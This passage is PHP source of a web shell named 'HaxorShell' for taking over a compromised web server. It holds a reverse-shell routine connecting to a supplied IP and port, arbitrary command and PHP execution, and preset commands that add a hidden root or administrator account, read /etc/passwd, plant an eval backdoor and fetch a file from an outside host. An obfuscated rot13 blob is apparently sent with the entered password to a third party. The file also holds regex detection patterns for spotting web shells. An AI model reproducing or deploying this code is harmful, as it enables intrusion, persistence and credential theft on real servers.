strdir($dir . \'/t00ls\');\n $key = filew($file, base64_decode($c_bin), \'wb\');\n if ($key) {\n @chmod($file, 0777);\n command($file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "php":\n case "phpwin":\n if (function_exists(\'fsockopen\')) {\n $sock = @fsockopen($ip, $port);\n if ($sock) {\n $key = true;\n $com = $type == \'phpwin\' ? true : false;\n $user = get_current_user();\n $dir = strdir(getcwd());\n fputs($sock, php_uname() . "\\n------------no job control in this shell (tty)-------------\\n[{$user}:{$dir}]# ");\n while ($cmd = fread($sock, 1024)) {\n if (substr($cmd, 0, 3) == \'cd \') {\n $dir = trim(substr($cmd, 3, -1));\n chdir(strdir($dir));\n $dir = strdir(getcwd());\n } elseif (trim(strtolower($cmd)) == \'exit\') {\n break;\n } else {\n $res = command($cmd, $dir, $com);\n fputs($sock, $res[\'res\']);\n }\n fputs($sock, \'[\' . $user . \':\' . $dir . \']# \');\n }\n }\n @fclose($sock);\n }\n break;\n case "pcntl":\n $file = strdir($dir . \'/t00ls\');\n $key = filew($file, base64_decode($c_bin), \'wb\');\n if ($key) {\n @chmod($file, 0777);\n if (function_exists(\'pcntl_exec\')) {\n @pcntl_exec($file, array($ip, $port));\n }\n }\n break;\n }\n if (!$key) {\n $msg = \'<h1>Temporary directory is not writable</h1>\';\n } else {\n @unlink($file);\n $msg = \'<h2>CLOSE</h2>\';\n }\n return $msg;\n}\nfunction getinfo()\n{\n global $password;\n $infos = array($_POST[\'getpwd\'], $password, function_exists(\'phpinfo\'), "127.0.0.1");\n if ($password != \'\' && md5($infos[0]) != $infos[1]) {\n echo \'<html><body><center><form method="POST"><input type="password" name="getpwd"> \';\n if (isset($_POST[\'pass\'])) {\n echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n }\n if (isset($_POST[\'check\'])) {\n echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n }\n echo \'<input type="submit" value="Go"></form></center></body></html>\';\n exit;\n }\n if (!isset($_POST[\'go\']) && !isset($_POST[\'dir\'])) {\n $html = \'WUIvMzptCFNvKTf3A1keAmqpnmp3KTflpykeAmEpnmL4KTf2BIkeAmApnmL0KTf2p1keAaApnmplKTflpykeAwApnmMmKTf2pFV7WUElMlN9VPWpnmWmKTf2Z1keAaApnmMmKTf2pSkeZaApnmp1KTf3ZSkeAwEpnmLkKTf3ASkeAwIpnmWlKTf3ZSkeAwupnmpjKTfmp1keAwqpnmAkVwfxqUWaVP49VT92LGW1pzfbWS9THxIWHxIoW1IUE0AsIHWTElqqXF4vKTflAykeAmApnmAkVv5iqzRlqKWeXPEsEyWSFIWSJlqQIHAsEyWMHlqqXF4vKTf\' . \'lAykeAmOpnmAkVv4xozIyozj7WUShM24tCFNvKTf0A1keAQIpnmH0KTflZPVhWUElMl4vKTflZSkeAQupnmH0KTf1ASkeAGOpnmWmKTfmZIkeZaWpnmZkKTIpLIkeAQupnmMmKTf3Z1keAmEpnmAhVv4xqJWzMl4vKTIpLIkeAQApnmMmKTf2pykeAaWpnmL1KTf2Z1keAmEpnmL5KTf2p1keAaWpnmAhKTflZSkeAQApnmMjKTf2p1keAmApnmL1KTIpLIkyKTRvB3MmXUAbLKOaqzWuK3WeqzMaMvtvKTf2AykeAmApnmMmKTf2Z1keAz9pnmMmKTf3ZSkeAwIpnmMlVvxcVUftWTMvpUttCFONp2MvpUuvL3WuXPE1LzMaYUIln3SlpPt1ZPxcBlONp2AbM2LbWTMvpUtfWUShM24cBlONp3O5LzMlXPEzLaO4XGftsKW5MaVtrlONp3M5py90pzqspTWuM3WuM2LbVykeAwupnmp0KTf3ASkeAmOpnmAhKTflp1keZaZvYvE1LzMaYvE0pzpcBlO9VTIlM2uyLFOaMJulBj==\';\n if ($_SERVER[\'SERVER_ADDR\'] != $infos[3] && $_SERVER[\'REMOTE_ADDR\'] != $infos[3]) {\n postinfo($infos[0], str_rot13($html));\n }\n }\n return $infos[2];\n}\nfunction subeval()\n{\n if (isset($_POST[\'getpwd\'])) {\n echo \'<input type="hidden" name="getpwd" value="\' . $_POST[\'getpwd\'] . \'">\';\n }\n if (isset($_POST[\'pass\'])) {\n echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n }\n if (isset($_POST[\'check\'])) {\n echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n }\n return true;\n}\nif (isset($_POST[\'go\'])) {\n if ($_POST[\'go\'] == \'down\') {\n $downfile = $fileb = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n if (!filed($downfile)) {\n $msg = \'<h1>The download file does not exist</h1>\';\n }\n }\n}\n?>\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta content="width=device-width, initial-scale=1" name="viewport"/><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}.tables tr:hover td {background-color: #EEE685;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,\'"\'); str = str.replace(/%27/g,"\'"); return str; }function cd(dir) { dir = sd(dir); $(\'dir\').value = dir; $(\'frm\').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == \'checkbox\') { if(e.name != \'chkall\') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $(\'go\').value = a; $(\'govar\').value = b; if(a == \'editor\') { $(\'gofrm\').target = "_blank"; } else { $(\'gofrm\').target = ""; } $(\'gofrm\').submit(); } function nf(a,b) { re = prompt("New name",b); if(re) { $(\'go\').value = a; $(\'govar\').value = re; $(\'gofrm\').submit(); } } function dels(a) { if(a == \'b\') { var msg = ""; $(\'act\').value = a; } else { var msg = ""; $(\'act\').value = \'deltree\'; $(\'var\').value = a; } if(confirm("Are you sure you want to delete? "+msg+"")) { $(\'frm1\').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $(\'var\').value = re; $(\'act\').value = a; $(\'frm1\').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $(\'var\').value = re+\'|x|\'+f; $(\'act\').value = a; $(\'frm1\').submit(); } }</script><title><?php \n$sitename = $_SERVER[\'SERVER_NAME\'];\necho $sitename .\' | HaxorShell\';\n?>\n</title></head><body><div class="main"><div class="outl"><div class="toptag"><?php \necho $_SERVER[\'SERVER_ADDR\'] . \' - \' . PHP_OS . \' - whoami(\' . get_current_user() . \') - [uid(\' . getmyuid() . \') gid(\' . getmygid() . \')]\';\nif (isset($issql)) {\n echo \' - [\' . $issql . \']\';\n}\n?>\n</div><?php \n$menu = array(\'file\' => \'File Mgr\', \'scan\' => \'Searcher\', \'antivirus\' => \'Antivirus\', \'backshell\' => \'Bind Port\', \'exec\' => \'Exec CMD\', \'phpeval\' => \'Exec PHP\', \'sql\' => \'Exec SQL\', \'info\' => \'System\');\n$go = array_key_exists($_POST[\'go\'], $menu) ? $_POST[\'go\'] : \'file\';\n$nowdir = isset($_POST[\'dir\']) ? strdir(chop($_POST[\'dir\']) . \'/\') : THISDIR;\necho \'<div class="tag">\';\nforeach ($menu as $key => $name) {\n echo \'<a\' . ($go == $key ? \' class="current"\' : \'\') . \' href="javascript:void(0);" onclick="go(\\\'\' . $key . \'\\\',\\\'\' . base64_encode($nowdir) . \'\\\');">\' . $name . \'</a> \';\n}\necho \'</div>\';\necho \'<form name="gofrm" id="gofrm" method="POST">\';\nsubeval();\necho \'<input type="hidden" name="go" id="go" value="">\';\necho \'<input type="hidden" name="godir" id="godir" value="\' . $nowdir . \'">\';\necho \'<input type="hidden" name="govar" id="govar" value="">\';\necho \'</form>\';\nswitch ($_POST[\'go\']) {\n case "info":\n if (EXISTS_PHPINFO) {\n ob_start();\n phpinfo(INFO_GENERAL);\n $out = ob_get_contents();\n ob_end_clean();\n $tmp = array();\n preg_match_all(\'/\\\\<td class\\\\=\\\\"e\\\\"\\\\>.*?(Command|Configuration)+.*?\\\\<\\\\/td\\\\>\\\\<td class\\\\=\\\\"v\\\\"\\\\>(.*?)\\\\<\\\\/td\\\\>/i\', $out, $tmp);\n $config = $tmp[2][0];\n $phpini = $tmp[2][2] ? $tmp[2][1] . \' --- \' . $tmp[2][2] : $tmp[2][1];\n }\n $infos = array(\'Browser Info\' => $_SERVER[\'HTTP_USER_AGENT\'], \'Disabled Functions\' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : \'(None)\', \'Disabled Class\' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : \'(None)\', \'PHP.ini Path\' => $phpini ? $phpini : \'(None)\', \'PHP Method\' => php_sapi_name(), \'PHP Version\' => PHP_VERSION, \'PHP PID\' => getmypid(), \'Server IP\' => $_SERVER[\'REMOTE_ADDR\'], \'Encoding\' => $_SERVER[\'HTTP_ACCEPT_LANGUAGE\'], \'Web Port\' => $_SERVER[\'SERVER_PORT\'], \'Root Directory\' => $_SERVER[\'DOCUMENT_ROOT\'], \'Shell Location\' => $_SERVER[\'SCRIPT_FILENAME\'], \'CGI Version\' => $_SERVER[\'GATEWAY_INTERFACE\'], \'Webmaster Email\' => $_SERVER[\'SERVER_ADMIN\'] ? $_SERVER[\'SERVER_ADMIN\'] : \'(None)\', \'Disk Size\' => size(disk_total_space(\'.\')), \'Free Space\' => size(disk_free_space(\'.\')), \'Limit POST\' => get_cfg_var("post_max_size"), \'Max Upload\' => get_cfg_var("upload_max_filesize"), \'Limit Memory\' => get_cfg_var("memory_limit"), \'Max Exec Time\' => get_cfg_var("max_execution_time") . \' Second\', \'Fsockopen Support\' => function_exists(\'fsockopen\') ? \'Yes\' : \'No\', \'Socket Support\' => function_exists(\'socket_close\') ? \'Yes\' : \'No\', \'Pcntl Support\' => function_exists(\'pcntl_exec\') ? \'Yes\' : \'No\', \'Curl Support\' => function_exists(\'curl_version\') ? \'Yes\' : \'No\', \'Zlib Support\' => function_exists(\'gzclose\') ? \'Yes\' : \'No\', \'FTP Support\' => function_exists(\'ftp_login\') ? \'Yes\' : \'No\', \'XML Support\' => function_exists(\'xml_set_object\') ? \'Yes\' : \'No\', \'GD_Library Support\' => function_exists(\'imageline\') ? \'Yes\' : \'No\', \'COM Formation Support\' => class_exists(\'COM\') ? \'Yes\' : \'No\', \'ODBC Components Support\' => function_exists(\'odbc_close\') ? \'Yes\' : \'No\', \'IMAP Mail Support\' => function_exists(\'imap_close\') ? \'Yes\' : \'No\', \'Safe Mode Support\' => get_cfg_var("safemode") ? \'Yes\' : \'No\', \'URL Fopen Support\' => get_cfg_var("allow_url_fopen") ? \'Yes\' : \'No\', \'Dynamic Libraries Support\' => get_cfg_var("enable_dl") ? \'Yes\' : \'No\', \'Display Error Support\' => get_cfg_var("display_errors") ? \'Yes\' : \'No\', \'Register Global Support\' => get_cfg_var("register_globals") ? \'Yes\' : \'No\', \'Magic Quotes Support\' => get_cfg_var("magic_quotes_gpc") ? \'Yes\' : \'No\', \'PHP Compiler\' => $config ? $config : \'(None)\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<table class="tables"><tr><th style="width:26%;">Name</th><th>Parameter</th></tr>\';\n foreach ($infos as $name => $var) {\n echo \'<tr><td>\' . $name . \'</td><td>\' . $var . \'</td></tr>\';\n }\n echo \'</table>\';\n break;\n case "exec":\n $cmd = $win ? \'dir\' : \'ls -al\';\n $res = array(\'res\' => \'Result Command\', \'msg\' => $msg);\n $str = isset($_POST[\'str\']) ? $_POST[\'str\'] : \'fun\';\n if (isset($_POST[\'cmd\'])) {\n $cmd = $_POST[\'cmd\'];\n $cwd = $str == \'fun\' ? THISDIR : \'com\';\n $res = command($cmd, $cwd);\n }\n echo \'<div class="msgbox">\' . $res[\'msg\'] . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="exec">\';\n echo \'<div class="actall">Command <input type="text" name="cmd" id="cmd" value="\' . htmlspecialchars($cmd) . \'" style="width:398px;"> \';\n echo \'<select name="str">\';\n $selects = array(\'fun\' => \'phpfun\', \'com\' => \'wscript\');\n foreach ($selects as $var => $name) {\n echo \'<option value="\' . $var . \'"\' . ($var == $str ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n }\n echo \'</select> \';\n echo \'<select onchange="$(\\\'cmd\\\').value=options[selectedIndex].value">\';\n echo \'<option>---CMD Executor---</option>\';\n echo \'<option value="echo \' . htmlspecialchars(\'"<?php phpinfo();?>"\') . \' >> \' . THISDIR . \'haxorid.txt">Write File</option>\';\n echo \'<option value="whoami">Who Am I</option>\';\n echo \'<option value="net user sysadmin R00t@willy16 /add">Add User (Win)</option>\';\n echo \'<option value="net localgroup administrators sysadmin /add">Add Group (Win)</option>\';\n echo \'<option value="netstat -an">View Port (Win)</option>\';\n echo \'<option value="ipconfig /all">View Address (Win)</option>\';\n echo \'<option value="net start">View Service (Win)</option>\';\n echo \'<option value="tasklist">View Process (Win)</option>\';\n echo \'<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Version Collection (Linux)</option>\';\n echo \'<option value="/usr/sbin/useradd -u 0 -o -g 0 sysadmin">Add User (Linux)</option>\';\n echo \'<option value="cat /etc/passwd">View Users (Linux)</option>\';\n echo \'<option value="/bin/netstat -tnl">View Port (Linux)</option>\';\n echo \'<option value="/sbin/ifconfig -a">View Address (Linux)</option>\';\n echo \'<option value="/sbin/chkconfig --list">View Service (Linux)</option>\';\n echo \'<option value="/bin/ps -ef">View Process (Linux)</option>\';\n echo \'</select> \';\n echo \'<input type="submit" style="width:50px;" value="Go">\';\n echo \'</div><div class="actall"><textarea style="width:698px;height:368px;">\' . htmlspecialchars($res[\'res\']) . \'</textarea></div></form>\';\n break;\n case "scan":\n $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n $keyword = isset($_POST[\'keyword\']) ? $_POST[\'keyword\'] : \'\';\n $include = isset($_POST[\'include\']) ? chop($_POST[\'include\']) : \'.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py\';\n $filters = isset($_POST[\'filters\']) ? chop($_POST[\'filters\']) : \'html|css|img|images|image|style|js\';\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="scan">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Search path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:500px;"></td></tr>\';\n echo \'<tr><td>Search content</td><td><input type="text" name="keyword" value="\' . htmlspecialchars($keyword) . \'" style="width:500px;"> (File name or file content)</td></tr>\';\n echo \'<tr><td>File extension</td><td><input type="text" name="include" value="\' . htmlspecialchars($include) . \'" style="width:500px;"> (Separate with "|", empty = search all files)</td></tr>\';\n echo \'<tr><td>Filter Dir</td><td><input type="text" name="filters" value="\' . htmlspecialchars($filters) . \'" style="width:500px;"> (Separate with "|", empty = not filtered)</td></tr>\';\n echo \'<tr><td>Search method</td><td><label><input type="radio" name="type" value="0"\' . ($_POST[\'type\'] ? \'\' : \' checked\') . \'>File name</label> \';\n echo \'<label><input type="radio" name="type" value="1"\' . ($_POST[\'type\'] ? \' checked\' : \'\') . \'>Contains inside</label> \';\n echo \'<label><input type="checkbox" name="char" value="1"\' . ($_POST[\'char\'] ? \' checked\' : \'\') . \'>Match case</label></td></tr>\';\n echo \'<tr><td>Search scope</td><td><label><input type="radio" name="range" value="0"\' . ($_POST[\'range\'] ? \'\' : \' checked\') . \'>Apply the search to the folder, subfolders and files</label> \';\n echo \'<label><input type="radio" name="range" value="1"\' . ($_POST[\'range\'] ? \' checked\' : \'\') . \'>Only apply search to this folder</label></td></tr>\';\n echo \'<tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if ($keyword != \'\') {\n flush();\n ob_flush();\n echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n $incs = $include == \'\' ? false : explode(\'|\', $include);\n $fits = $filters == \'\' ? false : explode(\'|\', $filters);\n $isread = scanfile(strdir($scandir . \'/\'), $keyword, $incs, $fits, $_POST[\'type\'], $_POST[\'char\'], $_POST[\'range\'], $nowdir);\n echo \'<p>\' . ($isread ? \'<h2>Search complete</h2>\' : \'<h1>Search failed</h1>\') . \'</p></div>\';\n }\n break;\n case "antivirus":\n $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n $typearr = isset($_POST[\'dir\']) ? $_POST[\'types\'] : array(\'php\' => \'.php\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="antivirus">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Scan path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:398px;"> (Regular matching)</td></tr>\';\n echo \'<tr><td>Type of killing</td><td>\';\n $types = array(\'php\' => \'.php\', \'asp+aspx\' => \'.as|.cs|.cer\', \'jsp\' => \'.jsp\');\n foreach ($types as $key => $ex) {\n echo \'<label title="\' . $ex . \'"><input type="checkbox" name="types[\' . $key . \']" value="\' . $ex . \'"\' . ($typearr[$key] == $ex ? \' checked\' : \'\') . \'>\' . $key . \'</label> \';\n }\n echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if (count($_POST[\'types\']) > 0) {\n $matches = array(\'php\' => array(\'/function\\\\_exists\\\\s*\\\\(\\\\s*[\\\'|\\\\"](popen|exec|proc\\\\_open|system|passthru)+[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/(exec|shell\\\\_exec|system|passthru)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(udp\\\\:\\\\/\\\\/(.*)\\\\;)+/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\(base64\\\\_decode\\\\(\\\\$/i\', \'/(eval|assert|include|require)+\\\\s*\\\\((.*)(base64\\\\_decode|file\\\\_get\\\\_contents|php\\\\:\\\\/\\\\/input)+/i\', \'/(eval|assert|include|require|array\\\\_map)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\(\\\\s*\\\\$(.*)\\\\)/i\', \'/\\\\(\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\,\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(fopen|fwrite|fpust|file\\\\_put\\\\_contents)+\\\\s*\\\\((.*)\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\](.*)\\\\)/i\', \'/echo\\\\s*curl\\\\_exec\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/new com\\\\s*\\\\(\\\\s*[\\\'|\\\\"]shell(.*)[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/\\\\$(.*)\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/\\\\$\\\\_\\\\=(.*)\\\\$\\\\_/i\'), \'asp+aspx\' => array(\'/(VBScript\\\\.Encode|WScript\\\\.shell|Shell\\\\.Application|Scripting\\\\.FileSystemObject)+/i\', \'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/\\\\<script\\\\s*runat\\\\s*\\\\=(.*)server(.*)\\\\>(.*)\\\\<\\\\/script\\\\>/i\', \'/Load\\\\s*\\\\((.*)Request/i\', \'/StreamWriter\\\\(Server\\\\.MapPath(.*)\\\\.Write\\\\(Request/i\'), \'jsp\' => array(\'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/Runtime\\\\.getRuntime\\\\(\\\\)\\\\.exec\\\\((.*)\\\\)/i\', \'/FileOutputStream\\\\(application\\\\.getRealPath(.*)request/i\'));\n flush();\n ob_flush();\n echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n $isread = antivirus(strdir($scandir . \'/\'), $typearr, $matches, $nowdir);\n echo \'<p>\' . ($isread ? \'<h2>Scan complete</h2>\' : \'<h1>Scan failed</h1>\') . \'</p></div>\';\n }\n break;\n case "phpeval":\n if (isset($_POST[\'phpcode\'])) {\n $phpcode = chop($_POST[\'phpcode\']);\n ob_start();\n if (substr($phpcode, 0, 2) == \'<?\' && substr($phpcode, -2) == \'?>\') {\n @eval(\'?>\' . $phpcode . \'<?php \');\n } else {\n @eval($phpcode);\n }\n $out = ob_get_contents();\n ob_end_clean();\n } else {\n $phpcode = \'phpinfo();\';\n $out = \'Result Program\';\n }\n echo base64_decode(\'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="phpeval">\';\n echo \'<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">\' . htmlspecialchars($phpcode) . \'</textarea></p><p>\';\n echo \'<select onchange="$(\\\'phpcode\\\').value=options[selectedIndex].value">\';\n echo \'<option>---Common Code---</option>\';\n echo \'<option value="echo readfile(\\\'C:/web/haxor.php\\\');">Read file</option>\';\n echo \'<option value="$fp=fopen(\\\'C:/web/haxor.php\\\',\\\'w\\\');echo fputs($fp,\\\'<?php eval($_POST[cmd]);?>\\\')?\\\'Success!\\\':\\\'Fail!\\\';fclose($fp);">Write file</option>\';\n echo \'<option value="echo copy(\\\'C:/web/mi77i.php\\\',\\\'C:/web/haxor.php\\\')?\\\'Success!\\\':\\\'Fail!\\\';">Copy files</option>\';\n echo \'<option value="echo chmod(\\\'C:/web/mi77i.php\\\',0777)?\\\'Success!\\\':\\\'Fail!\\\';">Modify properties</option>\';\n echo \'<option value="echo file_put_contents(\\\'\' . THISDIR . \'cmd.exe\\\', file_get_contents(\\\'http://hax.or.id/indo.txt\\\'))?\\\'Success!\\\':\\\'Fail!\\\';">Remote download</option>\';\n echo \'<option value="print_r($_SERVER);">Environment variable</option>\';\n echo \'</select> \';\n echo \'<input type="submit" style="width:80px;" value="Go"></p></div>\';\n echo \'</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">\' . htmlspecialchars($out) . \'</textarea></p><p><input type="button" value="Run in HTML" onclick="runcode(\\\'evalcode\\\')"></p></div>\';\n break;\n case "sql":\n if (!empty($_POST[\'sqlhost\']) && !empty($_POST[\'sqluser\']) && !empty($_POST[\'names\'])) {\n $type = $_POST[\'type\'];\n $sqlhost = $_POST[\'sqlhost\'];\n $sqluser = $_POST[\'sqluser\'];\n $sqlpass = $_POST[\'sqlpass\'];\n $sqlname = $_POST[\'sqlname\'];\n $sqlcode = $_POST[\'sqlcode\'];\n $names = $_POST[\'names\'];\n switch ($type) {\n case "PostgreSql":\n if (function_exists(\'pg_close\')) {\n if (strstr($sqlhost, \':\')) {\n $array = explode(\':\', $sqlhost);\n $sqlhost = $array[0];\n $sqlport = $array[1];\n } else {\n $sqlport = 5432;\n }\n $dbconn = @pg_connect("host={$sqlhost} port={$sqlport} dbname={$sqlname} user={$sqluser} password={$sqlpass}");\n if ($dbconn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n pg_query(\'set client_encoding=\' . $names);\n $result = pg_query($sqlcode);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = pg_fetch_array($result)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'error\' => pg_result_error($result));\n }\n pg_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @pg_close($dbconn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "MsSql":\n if (function_exists(\'mssql_close\')) {\n $dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);\n if ($dbconn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n mssql_select_db($sqlname, $dbconn);\n $result = mssql_query($sqlcode);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = mssql_fetch_array($result)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n }\n @mssql_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @mssql_close($dbconn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "Oracle":\n if (function_exists(\'oci_close\')) {\n $conn = @oci_connect($sqluser, $sqlpass, $sqlhost . \'/\' . $sqlname);\n if ($conn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n $stid = oci_parse($conn, $sqlcode);\n oci_execute($stid);\n if ($stid) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = oci_fetch_array($stid, OCI_ASSOC)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $e = oci_error();\n $rows = array(\'error\' => $e[\'message\']);\n }\n oci_free_statement($stid);\n } else {\n $e = oci_error();\n $rows = array(\'error\' => $e[\'message\']);\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @oci_close($conn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "MySql":\n if (function_exists(\'mysql_close\')) {\n $conn = mysql_connect(strstr($sqlhost, \':\') ? $sqlhost : $sqlhost . \':3306\', $sqluser, $sqlpass, $sqlname);\n if ($conn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n if (substr($sqlcode, 0, 7) == \'t00lsa\') {\n $array = array();\n $data = \'\';\n $i = 0;\n preg_match_all(\'/t00lsa\\\\s*\\\'(.*)\\\'\\\\s*t00lsb\\\\s*\\\'(.*)\\\'\\\\s*t00lsc\\\\s*\\\'(.*)\\\'\\\\s*t00lsfile\\\\s*\\\'(.*)\\\'/i\', $sqlcode, $array);\n if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {\n 